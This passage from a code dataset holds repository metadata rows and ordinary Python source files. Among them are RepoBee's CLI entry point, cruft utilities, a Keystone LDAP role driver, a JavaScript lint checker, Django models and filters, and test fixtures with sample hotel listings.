| 24.833333 | 63 | 0.667785 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 79 | 0.088367 |
d59eac60ee49212e2ee889df53673f9ab5d4edcb | 150 | py | Python | bugtests/test256.py | doom38/jython_v2.2.1 | 0803a0c953c294e6d14f9fc7d08edf6a3e630a15 | [
"CNRI-Jython"
] | null | null | null | bugtests/test256.py | doom38/jython_v2.2.1 | 0803a0c953c294e6d14f9fc7d08edf6a3e630a15 | [
"CNRI-Jython"
] | null | null | null | bugtests/test256.py | doom38/jython_v2.2.1 | 0803a0c953c294e6d14f9fc7d08edf6a3e630a15 | [
"CNRI-Jython"
] | null | null | null | """
"""
import support
support.compileJPythonc("test256a.py", core=1, jar="test256.jar", output="test256.err")
#raise support.TestError("" + `x`)
| 15 | 87 | 0.673333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 81 | 0.54 |
d59ed04f2f421d592db7ca01711e238752f15f07 | 1,307 | py | Python | cruft/_commands/utils/cruft.py | timothycrosley/cruft | 4d503c144d7268345c56f9ef4221a56ffc706739 | [
"MIT"
] | 87 | 2019-09-25T07:41:27.000Z | 2020-08-17T20:09:52.000Z | cruft/_commands/utils/cruft.py | timothycrosley/cruft | 4d503c144d7268345c56f9ef4221a56ffc706739 | [
"MIT"
] | 47 | 2019-10-03T05:33:34.000Z | 2020-08-16T09:03:35.000Z | cruft/_commands/utils/cruft.py | timothycrosley/cruft | 4d503c144d7268345c56f9ef4221a56ffc706739 | [
"MIT"
] | 9 | 2019-09-24T06:51:31.000Z | 2020-08-06T07:59:47.000Z | import json
from pathlib import Path
from typing import Any, Dict
from git import Repo
from cruft.exceptions import CruftAlreadyPresent, NoCruftFound
CruftState = Dict[str, Any]
#######################
# Cruft related utils #
#######################
def get_cruft_file(project_dir_path: Path, exists: bool = True) -> Path:
cruft_file = project_dir_path / ".cruft.json"
if not exists and cruft_file.is_file():
raise CruftAlreadyPresent(cruft_file)
if exists and not cruft_file.is_file():
raise NoCruftFound(project_dir_path.resolve())
return cruft_file
def is_project_updated(repo: Repo, current_commit: str, latest_commit: str, strict: bool) -> bool:
return (
# If the latest commit exactly matches the current commit
latest_commit == current_commit
# Or if there have been no changes to the cookiecutter
or not repo.index.diff(current_commit)
# or if the strict flag is off, we allow for newer commits to count as up to date
or (
repo.is_ancestor(repo.commit(latest_commit), repo.commit(current_commit)) and not strict
)
)
def json_dumps(cruft_state: Dict[str, Any]) -> str:
text = json.dumps(cruft_state, ensure_ascii=False, indent=2, separators=(",", ": "))
return text + "\n"
| 31.119048 | 100 | 0.673298 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 285 | 0.218057 |
d59f1dcccbd32af829381dd3853ec683d08d3461 | 8,604 | py | Python | src/_repobee/main.py | tohanss/repobee | cf5eb1e83e62c20bbca00c8ad9f798a612e1664f | [
"MIT"
] | null | null | null | src/_repobee/main.py | tohanss/repobee | cf5eb1e83e62c20bbca00c8ad9f798a612e1664f | [
"MIT"
] | null | null | null | src/_repobee/main.py | tohanss/repobee | cf5eb1e83e62c20bbca00c8ad9f798a612e1664f | [
"MIT"
] | null | null | null | """Main entrypoint for the repobee CLI application.
.. module:: main
:synopsis: Main entrypoint for the repobee CLI application.
.. moduleauthor:: Simon Larsén
"""
import argparse
import contextlib
import io
import logging
import os
import pathlib
import sys
from typing import List, Optional, Union, Mapping
from types import ModuleType
import repobee_plug as plug
import _repobee.cli.dispatch
import _repobee.cli.parsing
import _repobee.cli.preparser
import _repobee.cli.mainparser
from _repobee import plugin
from _repobee import exception
from _repobee import config
from _repobee.cli.preparser import separate_args
from _repobee import distinfo
from _repobee import disthelpers
_PRE_INIT_ERROR_MESSAGE = """exception was raised before pre-initialization was
complete. This is usually due to incorrect settings.
Try running the `verify-settings` command and see if
the problem can be resolved. If all fails, please open
an issue at https://github.com/repobee/repobee/issues/new
and supply the stack trace below.""".replace(
"\n", " "
)
def run(
cmd: List[str],
config_file: Union[str, pathlib.Path] = "",
plugins: Optional[List[Union[ModuleType, plug.Plugin]]] = None,
workdir: Union[str, pathlib.Path] = ".",
) -> Mapping[str, List[plug.Result]]:
"""Run RepoBee with the provided options. This function is mostly intended
to be used for testing plugins.
.. important::
This function will always unregister all plugins after execution,
including anly plugins that may have been registered prior to running
this function.
Running this function is almost equivalent to running RepoBee from the CLI,
with the following exceptions:
1. Preparser options must be passed as arguments to this function (i.e.
cannot be given as part of ``cmd``).
2. There is no error handling at the top level, so exceptions are raised
instead of just logged.
As an example, the following CLI call:
.. code-block:: bash
$ repobee --plug ext.py --config-file config.ini config show
Can be executed as follows:
.. code-block:: python
import ext
from repobee import run
run(["config", "show"], config_file="config.ini", plugins=[ext])
Args:
cmd: The command to run.
config_file: Path to the configuration file.
plugins: A list of plugin modules and/or plugin classes.
workdir: The working directory to run RepoBee in.
Returns:
A mapping (plugin_name -> plugin_results).
"""
config_file = pathlib.Path(config_file)
cur_workdir = pathlib.Path(".").absolute()
requested_workdir = pathlib.Path(str(workdir)).resolve(strict=True)
@contextlib.contextmanager
def _in_requested_workdir():
try:
os.chdir(requested_workdir)
yield
finally:
os.chdir(cur_workdir)
def _ensure_is_module(p: Union[ModuleType, plug.Plugin]):
if isinstance(p, type) and issubclass(p, plug.Plugin):
mod = ModuleType(p.__name__.lower())
mod.__package__ = f"__{p.__name__}"
setattr(mod, p.__name__, p)
return mod
elif isinstance(p, ModuleType):
return p
else:
raise TypeError(f"not plugin or module: {p}")
wrapped_plugins = list(map(_ensure_is_module, plugins or []))
with _in_requested_workdir():
try:
_repobee.cli.parsing.setup_logging()
# FIXME calling _initialize_plugins like this is ugly, should be
# refactored
_initialize_plugins(argparse.Namespace(no_plugins=False, plug=[]))
plugin.register_plugins(wrapped_plugins)
parsed_args, api = _parse_args(cmd, config_file)
with _set_output_verbosity(getattr(parsed_args, "quiet", 0)):
return _repobee.cli.dispatch.dispatch_command(
parsed_args, api, config_file
)
finally:
plugin.unregister_all_plugins()
def main(sys_args: List[str], unload_plugins: bool = True):
"""Start the repobee CLI.
Args:
sys_args: Arguments from the command line.
unload_plugins: If True, plugins are automatically unloaded just before
the function returns.
"""
try:
_main(sys_args, unload_plugins)
except Exception:
plug.log.error(
"RepoBee exited unexpectedly. "
"Please visit the FAQ to try to resolve the problem: "
"https://repobee.readthedocs.io/en/stable/faq.html"
)
sys.exit(1)
def _main(sys_args: List[str], unload_plugins: bool = True):
_repobee.cli.parsing.setup_logging()
args = sys_args[1:] # drop the name of the program
traceback = False
pre_init = True
try:
preparser_args, app_args = separate_args(args)
parsed_preparser_args = _repobee.cli.preparser.parse_args(
preparser_args
)
_initialize_plugins(parsed_preparser_args)
parsed_args, api = _parse_args(
app_args, parsed_preparser_args.config_file
)
traceback = parsed_args.traceback
pre_init = False
with _set_output_verbosity(getattr(parsed_args, "quiet", 0)):
_repobee.cli.dispatch.dispatch_command(
parsed_args, api, parsed_preparser_args.config_file
)
except exception.PluginLoadError as exc:
plug.log.error(f"{exc.__class__.__name__}: {exc}")
raise
except exception.ParseError as exc:
plug.log.error(str(exc))
raise
except Exception as exc:
# FileErrors can occur during pre-init because of reading the config
# and we don't want tracebacks for those (afaik at this time)
if traceback or (
pre_init and not isinstance(exc, exception.FileError)
):
plug.log.error(str(exc))
if pre_init:
plug.echo(_PRE_INIT_ERROR_MESSAGE)
plug.log.exception("Critical exception")
else:
plug.log.error("{.__class__.__name__}: {}".format(exc, str(exc)))
raise
finally:
if unload_plugins:
plugin.unregister_all_plugins()
def _initialize_plugins(parsed_preparser_args: argparse.Namespace) -> None:
# IMPORTANT: the default plugins must be loaded before user-defined
# plugins to ensure that the user-defined plugins override the defaults
# in firstresult hooks
plug.log.debug("Initializing default plugins")
plugin.initialize_default_plugins()
if distinfo.DIST_INSTALL:
plug.log.debug("Initializing dist plugins")
plugin.initialize_dist_plugins()
if not parsed_preparser_args.no_plugins:
if distinfo.DIST_INSTALL:
plug.log.debug("Initializing active plugins")
plugin.initialize_plugins(
disthelpers.get_active_plugins(), allow_filepath=True
)
plug.log.debug("Initializing preparser-specified plugins")
plugin_names = parsed_preparser_args.plug or []
plugin.initialize_plugins(plugin_names, allow_filepath=True)
def _parse_args(args, config_file):
config.execute_config_hooks(config_file)
parsed_args, api = _repobee.cli.parsing.handle_args(
args, config_file=config_file
)
plug.manager.hook.handle_processed_args(args=parsed_args)
return parsed_args, api
@contextlib.contextmanager
def _set_output_verbosity(quietness: int):
"""Set the output verbosity, expecting `quietness` to be a non-negative
integer.
0 = do nothing, all output goes
1 = silence "regular" user feedback
2 = silence warnings
>=3 = silence everything
"""
assert quietness >= 0
if quietness >= 1:
# silence "regular" user feedback by redirecting stdout
with contextlib.redirect_stdout(io.StringIO()):
if quietness == 2:
# additionally silence warnings
_repobee.cli.parsing.setup_logging(
terminal_level=logging.ERROR
)
pass
elif quietness >= 3:
# additionally silence errors and warnings
_repobee.cli.parsing.setup_logging(
terminal_level=logging.CRITICAL
)
pass
yield
else:
# this must be in an else, because
# 1) the generator must yeld
# 2) it must yield precisely once
yield
if __name__ == "__main__":
main(sys.argv)
| 32.345865 | 79 | 0.65516 | 0 | 0 | 4,055 | 0.471238 | 1,266 | 0.147124 | 0 | 0 | 3,228 | 0.375131 |
d59f3c58b006cd25a25b2736e3fa1fa4e2390ff6 | 6,871 | py | Python | tests/config.py | kokokuo/auto_send_email | 509672dcb09a2a587ccfb8de4cf2d008c7bac5aa | [
"MIT"
] | 1 | 2019-06-20T15:07:25.000Z | 2019-06-20T15:07:25.000Z | tests/config.py | kokokuo/mailmerger | 509672dcb09a2a587ccfb8de4cf2d008c7bac5aa | [
"MIT"
] | 5 | 2019-05-23T09:51:46.000Z | 2021-08-01T09:49:33.000Z | tests/config.py | kokokuo/auto_send_email | 509672dcb09a2a587ccfb8de4cf2d008c7bac5aa | [
"MIT"
] | null | null | null | from enum import Enum
class TestCommonConfig(object):
LOGGER_NAME = "testing-logger"
SHEET_TEST_DIRNAME = "sheets"
EMAIL_TEMPLATE_TEST_DIRNAME = "templates"
class TestSheetColHeader(Enum):
"""
TestEnHeader.xlsx 與 TestCnHeader.xlsx 的 Column 標頭定義,差異為英文跟中文
"""
EN_HOTELNAME = "HotelName"
EN_ADDRESS = "Address"
EN_PHONE = "Phone"
EN_TOTAL_ROOMS = "TotalRooms"
EN_WEBSITE_URL = "WebsiteUrl"
EN_EMAIL = "Email"
CN_HOTELNAME = "旅館名稱"
CN_ADDRESS = "地址"
CN_PHONE = "聯絡電話"
CN_TOTAL_ROOMS = "總房間數"
CN_WEBSITE_URL = "網址"
CN_EMAIL = "信箱"
class TestSheetConfig(object):
TEST_EN_HEADER_SHEET_FILENAME = "TestEnHeader.xlsx"
TEST_CN_HEADER_SHEET_FILENAME = "TestCnHeader.xlsx"
TEST_NON_EXIST_SHEET_FILENAME = "NotExistSheetFile.xlsx"
TEST_NON_EXCEL_FORMAT_FILE = "TestFileNotExcelFormat.txt"
"""
檔案的試算表名稱
"""
TEST_EN_HEADER_SHEET_NAME = "HotelsInfo"
TEST_EN_HEADER_NON_EXIST_SHEET_NAME = "sheet1"
TEST_CN_HEADER_NON_EXIST_SHEET_NAME = "試算表"
TEST_CN_HEADER_SHEET_NAME = "旅館資訊"
class TestParsinExcelSheetConfig(object):
"""
TestEnHeader.xlsx 每 Row 資料:與 TestCnHeader.xlsx 的差異在 Column 標頭定義為英文
"""
TEST_DATASHEET_EN_HEADER_ROW_A = {
TestSheetColHeader.EN_HOTELNAME.value: "台北君悅酒店",
TestSheetColHeader.EN_ADDRESS.value: "110臺北市信義區松壽路2號",
TestSheetColHeader.EN_PHONE.value: "02-2720-1234",
TestSheetColHeader.EN_TOTAL_ROOMS.value: 865,
TestSheetColHeader.EN_WEBSITE_URL.value: "http://taipei.grand.hyatt.com",
TestSheetColHeader.EN_EMAIL.value: "taipei.grand@hyatt.com"
}
TEST_DATASHEET_EN_HEADER_ROW_B = {
TestSheetColHeader.EN_HOTELNAME.value: "凱達大飯店",
TestSheetColHeader.EN_ADDRESS.value: "108臺北市萬華區艋舺大道167號",
TestSheetColHeader.EN_PHONE.value: "02-2306-6777",
TestSheetColHeader.EN_TOTAL_ROOMS.value: 745,
TestSheetColHeader.EN_WEBSITE_URL.value: "http://www.caesarmetro.com",
TestSheetColHeader.EN_EMAIL.value: "cm.reservation@caesarpark.com.tw"
}
TEST_DATASHEET_EN_HEADER_ROW_C = {
TestSheetColHeader.EN_HOTELNAME.value: "王朝大酒店",
TestSheetColHeader.EN_ADDRESS.value: "105臺北市松山區敦化北路100號",
TestSheetColHeader.EN_PHONE.value: "02-27198399",
TestSheetColHeader.EN_TOTAL_ROOMS.value: 713,
TestSheetColHeader.EN_WEBSITE_URL.value: "http://www.sunworlddynasty.com.tw",
TestSheetColHeader.EN_EMAIL.value: "bc@sunworlddynasty.com.tw",
}
"""
TestCnHeader.xlsx 每 Row 資料:Column 標頭定義中文
"""
TEST_DATASHEET_CN_HEADER_ROW_A = {
TestSheetColHeader.CN_HOTELNAME.value: "台北君悅酒店",
TestSheetColHeader.CN_ADDRESS.value: "110臺北市信義區松壽路2號",
TestSheetColHeader.CN_PHONE.value: "02-2720-1234",
TestSheetColHeader.CN_TOTAL_ROOMS.value: 865,
TestSheetColHeader.CN_WEBSITE_URL.value: "http://taipei.grand.hyatt.com",
TestSheetColHeader.CN_EMAIL.value: "taipei.grand@hyatt.com"
}
TEST_DATASHEET_CN_HEADER_ROW_B = {
TestSheetColHeader.CN_HOTELNAME.value: "凱達大飯店",
TestSheetColHeader.CN_ADDRESS.value: "108臺北市萬華區艋舺大道167號",
TestSheetColHeader.CN_PHONE.value: "02-2306-6777",
TestSheetColHeader.CN_TOTAL_ROOMS.value: 745,
TestSheetColHeader.CN_WEBSITE_URL.value: "http://www.caesarmetro.com",
TestSheetColHeader.CN_EMAIL.value: "cm.reservation@caesarpark.com.tw"
}
TEST_DATASHEET_CN_HEADER_ROW_C = {
TestSheetColHeader.CN_HOTELNAME.value: "王朝大酒店",
TestSheetColHeader.CN_ADDRESS.value: "105臺北市松山區敦化北路100號",
TestSheetColHeader.CN_PHONE.value: "02-27198399",
TestSheetColHeader.CN_TOTAL_ROOMS.value: 713,
TestSheetColHeader.CN_WEBSITE_URL.value: "http://www.sunworlddynasty.com.tw",
TestSheetColHeader.CN_EMAIL.value: "bc@sunworlddynasty.com.tw",
}
"""
TestCnHeader.xlsx 的第四筆資料,作為測試錯誤的預期結果使用
"""
TEST_DATASHEET_CN_HEADER_ROW_D = {
TestSheetColHeader.CN_HOTELNAME.value: "台北寒舍喜來登大飯店",
TestSheetColHeader.CN_ADDRESS.value: "100臺北市中正區忠孝東路1段12號",
TestSheetColHeader.CN_PHONE.value: "02-2321-5511",
TestSheetColHeader.CN_TOTAL_ROOMS.value: 692,
TestSheetColHeader.CN_WEBSITE_URL.value: "http://www.sheratongrandtaipei.com",
TestSheetColHeader.CN_EMAIL.value: "sheraton@sheratongrandtaipei.com",
}
"""
TestEnHeader.xlsx 與 TestCnHeader.xlsx 的預期正確測試資料
"""
TEST_EN_HEADER_SHEET_EXPECTED_RESULT = [
TEST_DATASHEET_EN_HEADER_ROW_A,
TEST_DATASHEET_EN_HEADER_ROW_B,
TEST_DATASHEET_EN_HEADER_ROW_C
]
TEST_CN_HEADER_SHEET_EXPECTED_RESULT = [
TEST_DATASHEET_CN_HEADER_ROW_A,
TEST_DATASHEET_CN_HEADER_ROW_B,
TEST_DATASHEET_CN_HEADER_ROW_C
]
"""
TestCnHeader.xlsx 的預期錯誤測試,分別為資料不同 與 順序不同
"""
TEST_CN_HEADER_SHEET_NON_EXPECTED_RESULT_DATA_DIFF = [
TEST_DATASHEET_CN_HEADER_ROW_A,
TEST_DATASHEET_CN_HEADER_ROW_C,
TEST_DATASHEET_CN_HEADER_ROW_B
]
TEST_CN_HEADER_SHEET_NON_EXPECTED_RESULT_ORDER_DIFF = [
TEST_DATASHEET_CN_HEADER_ROW_A,
TEST_DATASHEET_CN_HEADER_ROW_B,
TEST_DATASHEET_CN_HEADER_ROW_D
]
class TestParsingSourceConfig(object):
"""
預期的合併 Column 標頭 以及資料
"""
TEST_CH_PREMERGE_SOURCE_EXPECTED_COLHEADER = [
TestSheetColHeader.CN_HOTELNAME.value,
TestSheetColHeader.CN_ADDRESS.value,
TestSheetColHeader.CN_PHONE.value,
TestSheetColHeader.CN_TOTAL_ROOMS.value,
TestSheetColHeader.CN_WEBSITE_URL.value,
TestSheetColHeader.CN_EMAIL.value
]
TEST_CH_PREMERGE_SOURCE_EXPECTED_ROWSET = \
TestParsinExcelSheetConfig.TEST_CN_HEADER_SHEET_EXPECTED_RESULT
"""
預期錯誤的合併 Column 標頭 以及 資料 - 資料不正確
"""
TEST_CH_PREMERGE_SOURCE_NON_EXPECTED_COLHEADER_DATA_DIFF = [
TestSheetColHeader.EN_HOTELNAME.value,
TestSheetColHeader.CN_ADDRESS.value,
TestSheetColHeader.CN_PHONE.value,
TestSheetColHeader.CN_TOTAL_ROOMS.value,
TestSheetColHeader.CN_WEBSITE_URL.value,
TestSheetColHeader.EN_EMAIL.value
]
TEST_CH_PREMERGE_SOURCE_NON_EXPECTED_ROWSET_DATA_DIFF = \
TestParsinExcelSheetConfig.TEST_CN_HEADER_SHEET_NON_EXPECTED_RESULT_DATA_DIFF
"""
預期錯誤的合併 Column 標頭 以及 資料 - 順序不正確
"""
TEST_CH_PREMERGE_SOURCE_NON_EXPECTED_COLHEADER_ORDER_DIFF = [
TestSheetColHeader.CN_HOTELNAME.value,
TestSheetColHeader.CN_TOTAL_ROOMS.value,
TestSheetColHeader.CN_PHONE.value,
TestSheetColHeader.CN_WEBSITE_URL.value,
TestSheetColHeader.CN_EMAIL.value,
TestSheetColHeader.CN_ADDRESS.value
]
TEST_CH_PREMERGE_SOURCE_NON_EXPECTED_ROWSET_ORDER_DIFF = \
TestParsinExcelSheetConfig.TEST_CN_HEADER_SHEET_NON_EXPECTED_RESULT_ORDER_DIFF
| 35.973822 | 86 | 0.726968 | 7,412 | 0.995033 | 0 | 0 | 0 | 0 | 0 | 0 | 2,071 | 0.278024 |
d5a06a4c867599293195597044d34e40bd2610d7 | 4,055 | py | Python | keystone/assignment/role_backends/ldap.py | yanheven/keystone | 417b8941095f40674575ed951b4a03ebcdc91fef | [
"Apache-2.0"
] | null | null | null | keystone/assignment/role_backends/ldap.py | yanheven/keystone | 417b8941095f40674575ed951b4a03ebcdc91fef | [
"Apache-2.0"
] | null | null | null | keystone/assignment/role_backends/ldap.py | yanheven/keystone | 417b8941095f40674575ed951b4a03ebcdc91fef | [
"Apache-2.0"
] | 1 | 2020-07-02T09:12:28.000Z | 2020-07-02T09:12:28.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from oslo_config import cfg
from oslo_log import log
from keystone import assignment
from keystone.common import ldap as common_ldap
from keystone.common import models
from keystone import exception
from keystone.i18n import _
from keystone.identity.backends import ldap as ldap_identity
CONF = cfg.CONF
LOG = log.getLogger(__name__)
class Role(assignment.RoleDriver):
def __init__(self):
super(Role, self).__init__()
self.LDAP_URL = CONF.ldap.url
self.LDAP_USER = CONF.ldap.user
self.LDAP_PASSWORD = CONF.ldap.password
self.suffix = CONF.ldap.suffix
# This is the only deep dependency from resource back
# to identity. The assumption is that if you are using
# LDAP for resource, you are using it for identity as well.
self.user = ldap_identity.UserApi(CONF)
self.role = RoleApi(CONF, self.user)
def get_role(self, role_id):
return self.role.get(role_id)
def list_roles(self, hints):
return self.role.get_all()
def list_roles_from_ids(self, ids):
return [self.get_role(id) for id in ids]
def create_role(self, role_id, role):
self.role.check_allow_create()
try:
self.get_role(role_id)
except exception.NotFound:
pass
else:
msg = _('Duplicate ID, %s.') % role_id
raise exception.Conflict(type='role', details=msg)
try:
self.role.get_by_name(role['name'])
except exception.NotFound:
pass
else:
msg = _('Duplicate name, %s.') % role['name']
raise exception.Conflict(type='role', details=msg)
return self.role.create(role)
def delete_role(self, role_id):
self.role.check_allow_delete()
return self.role.delete(role_id)
def update_role(self, role_id, role):
self.role.check_allow_update()
self.get_role(role_id)
return self.role.update(role_id, role)
# NOTE(heny-nash): A mixin class to enable the sharing of the LDAP structure
# between here and the assignment LDAP.
class RoleLdapStructureMixin(object):
DEFAULT_OU = 'ou=Roles'
DEFAULT_STRUCTURAL_CLASSES = []
DEFAULT_OBJECTCLASS = 'organizationalRole'
DEFAULT_MEMBER_ATTRIBUTE = 'roleOccupant'
NotFound = exception.RoleNotFound
options_name = 'role'
attribute_options_names = {'name': 'name'}
immutable_attrs = ['id']
model = models.Role
# TODO(termie): turn this into a data object and move logic to driver
class RoleApi(RoleLdapStructureMixin, common_ldap.BaseLdap):
def __init__(self, conf, user_api):
super(RoleApi, self).__init__(conf)
self._user_api = user_api
def get(self, role_id, role_filter=None):
model = super(RoleApi, self).get(role_id, role_filter)
return model
def create(self, values):
return super(RoleApi, self).create(values)
def update(self, role_id, role):
new_name = role.get('name')
if new_name is not None:
try:
old_role = self.get_by_name(new_name)
if old_role['id'] != role_id:
raise exception.Conflict(
_('Cannot duplicate name %s') % old_role)
except exception.NotFound:
pass
return super(RoleApi, self).update(role_id, role)
def delete(self, role_id):
super(RoleApi, self).delete(role_id)
| 32.18254 | 76 | 0.663872 | 2,936 | 0.724044 | 0 | 0 | 0 | 0 | 0 | 0 | 1,051 | 0.259186 |
d5a0d14841cc76eb2977a0ec7007fa46827f4e51 | 355 | py | Python | backend/apps/volontulo/templatetags/labeled_status.py | magul/volontulo | 778168219e003b585604ee88cc54d03575bdc00e | [
"MIT"
] | 16 | 2016-10-29T19:45:11.000Z | 2021-04-23T03:54:22.000Z | backend/apps/volontulo/templatetags/labeled_status.py | magul/volontulo | 778168219e003b585604ee88cc54d03575bdc00e | [
"MIT"
] | 1,063 | 2016-10-28T17:43:39.000Z | 2018-12-12T17:42:19.000Z | backend/apps/volontulo/templatetags/labeled_status.py | magul/volontulo | 778168219e003b585604ee88cc54d03575bdc00e | [
"MIT"
] | 60 | 2016-11-02T18:28:35.000Z | 2018-11-07T17:01:05.000Z | # -*- coding: utf-8 -*-
u"""
.. module:: labeled_status
"""
from django import template
from apps.volontulo.utils import OFFERS_STATUSES
register = template.Library()
@register.filter(name='human')
def human(status):
u"""Get offer status description.
:param status: string Status key
"""
return OFFERS_STATUSES.get(status, status)
| 16.136364 | 48 | 0.692958 | 0 | 0 | 0 | 0 | 180 | 0.507042 | 0 | 0 | 144 | 0.405634 |
d5a3714f67fe62a722e814c6e434ce5613a21bbc | 3,400 | py | Python | catapult_build/js_checks.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 1 | 2019-01-04T10:08:58.000Z | 2019-01-04T10:08:58.000Z | catapult_build/js_checks.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 6 | 2020-07-19T21:51:44.000Z | 2022-02-13T08:22:58.000Z | catapult_build/js_checks.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 1 | 2020-07-24T18:22:03.000Z | 2020-07-24T18:22:03.000Z | # Copyright (c) 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
import eslint
from py_vulcanize import strip_js_comments
from catapult_build import parse_html
class JSChecker(object):
def __init__(self, input_api, output_api, file_filter=None):
self.input_api = input_api
self.output_api = output_api
if file_filter:
self.file_filter = file_filter
else:
self.file_filter = lambda x: True
def RunChecks(self):
"""Checks for violations of the Chromium JavaScript style guide.
See:
http://chromium.org/developers/web-development-style-guide#TOC-JavaScript
"""
results = []
affected_files = self.input_api.AffectedFiles(
file_filter=self.file_filter,
include_deletes=False)
def ShouldCheck(f):
if f.LocalPath().endswith('.js'):
return True
if f.LocalPath().endswith('.html'):
return True
return False
affected_js_files = [f for f in affected_files if ShouldCheck(f)]
error_lines = []
for f in affected_js_files:
contents = list(f.NewContents())
error_lines += CheckStrictMode(
'\n'.join(contents),
is_html_file=f.LocalPath().endswith('.html'))
if affected_js_files:
success, eslint_output = eslint.RunEslint(
[f.AbsoluteLocalPath() for f in affected_js_files])
if not success:
error_lines.append('\neslint found lint errors:')
error_lines.append(eslint_output)
if error_lines:
error_lines.insert(0, 'Found JavaScript style violations:')
results.append(
_MakeErrorOrWarning(self.output_api, '\n'.join(error_lines)))
return results
def _ErrorHighlight(start, length):
"""Produces a row of '^'s to underline part of a string."""
return start * ' ' + length * '^'
def _MakeErrorOrWarning(output_api, error_text):
return output_api.PresubmitError(error_text)
def CheckStrictMode(contents, is_html_file=False):
statements_to_check = []
if is_html_file:
statements_to_check.extend(_FirstStatementsInScriptElements(contents))
else:
statements_to_check.append(_FirstStatement(contents))
error_lines = []
for s in statements_to_check:
if s != "'use strict'":
error_lines.append('Expected "\'use strict\'" as first statement, '
'but found "%s" instead.' % s)
return error_lines
def _FirstStatementsInScriptElements(contents):
"""Returns a list of first statements found in each <script> element."""
soup = parse_html.BeautifulSoup(contents)
script_elements = soup.find_all('script', src=None)
return [_FirstStatement(e.get_text()) for e in script_elements]
def _FirstStatement(contents):
"""Extracts the first statement in some JS source code."""
stripped_contents = strip_js_comments.StripJSComments(contents).strip()
matches = re.match('^(.*?);', stripped_contents, re.DOTALL)
if not matches:
return ''
return matches.group(1).strip()
def RunChecks(input_api, output_api, excluded_paths=None):
def ShouldCheck(affected_file):
if not excluded_paths:
return True
path = affected_file.LocalPath()
return not any(re.match(pattern, path) for pattern in excluded_paths)
return JSChecker(input_api, output_api, file_filter=ShouldCheck).RunChecks()
| 29.824561 | 78 | 0.704118 | 1,502 | 0.441765 | 0 | 0 | 0 | 0 | 0 | 0 | 716 | 0.210588 |
d5a40db4f8292b174efc5944ace79eb384db16eb | 1,919 | py | Python | care/facility/models/notification.py | gigincg/care | 07be6a7982b5c46a854e3435a52662f32800c8ae | [
"MIT"
] | 189 | 2020-03-17T17:18:58.000Z | 2022-02-22T09:49:45.000Z | care/facility/models/notification.py | gigincg/care | 07be6a7982b5c46a854e3435a52662f32800c8ae | [
"MIT"
] | 598 | 2020-03-19T21:22:09.000Z | 2022-03-30T05:08:37.000Z | care/facility/models/notification.py | gigincg/care | 07be6a7982b5c46a854e3435a52662f32800c8ae | [
"MIT"
] | 159 | 2020-03-19T18:45:56.000Z | 2022-03-17T13:23:12.000Z | import enum
from django.db import models
from care.facility.models import FacilityBaseModel
from care.users.models import User
from django.contrib.postgres.fields import JSONField
class Notification(FacilityBaseModel):
class EventType(enum.Enum):
SYSTEM_GENERATED = 50
CUSTOM_MESSAGE = 100
EventTypeChoices = [(e.value, e.name) for e in EventType]
class Medium(enum.Enum):
SYSTEM = 0
SMS = 100
WHATSAPP = 200
MediumChoices = [(e.value, e.name) for e in Medium]
class Event(enum.Enum):
MESSAGE = 0
PATIENT_CREATED = 20
PATIENT_UPDATED = 30
PATIENT_DELETED = 40
PATIENT_CONSULTATION_CREATED = 50
PATIENT_CONSULTATION_UPDATED = 60
PATIENT_CONSULTATION_DELETED = 70
INVESTIGATION_SESSION_CREATED = 80
INVESTIGATION_UPDATED = 90
PATIENT_FILE_UPLOAD_CREATED = 100
CONSULTATION_FILE_UPLOAD_CREATED = 110
PATIENT_CONSULTATION_UPDATE_CREATED = 120
PATIENT_CONSULTATION_UPDATE_UPDATED = 130
PATIENT_CONSULTATION_ASSIGNMENT = 140
SHIFTING_UPDATED = 200
EventChoices = [(e.value, e.name) for e in Event]
intended_for = models.ForeignKey(
User, on_delete=models.SET_NULL, null=True, related_name="notification_intended_for",
)
medium_sent = models.IntegerField(choices=MediumChoices, default=Medium.SYSTEM.value)
caused_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, related_name="notification_caused_by",)
read_at = models.DateTimeField(null=True, blank=True)
event_type = models.IntegerField(choices=EventTypeChoices, default=EventType.SYSTEM_GENERATED.value)
event = models.IntegerField(choices=EventChoices, default=Event.MESSAGE.value)
message = models.TextField(max_length=2000, null=True, default=None)
caused_objects = JSONField(null=True, blank=True, default=dict)
| 36.207547 | 117 | 0.72173 | 1,734 | 0.903596 | 0 | 0 | 0 | 0 | 0 | 0 | 51 | 0.026576 |
d5a4573d5ae49df24e84bfdf833cc441272c4eb6 | 176 | py | Python | services/startDriver.py | nayfaan/Google_rank_find | 77815b0f710ec4456f70a63b3359c02fd24753a8 | [
"MIT"
] | null | null | null | services/startDriver.py | nayfaan/Google_rank_find | 77815b0f710ec4456f70a63b3359c02fd24753a8 | [
"MIT"
] | null | null | null | services/startDriver.py | nayfaan/Google_rank_find | 77815b0f710ec4456f70a63b3359c02fd24753a8 | [
"MIT"
] | null | null | null | from selenium import webdriver
from selenium import *
def start():
return webdriver.Chrome(executable_path='./services/chromedriver')
if __name__ == "__main__":
pass
| 19.555556 | 70 | 0.744318 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 35 | 0.198864 |
d5a49556f65c7eab6e09e8c16d7151af12063b65 | 87 | py | Python | Chapter11/grades_ms/grades/grades_svc/admin.py | MichaelRW/Python-for-Geeks | a111f61f1a0b077fc0524431e1ccefd9214d5c53 | [
"MIT"
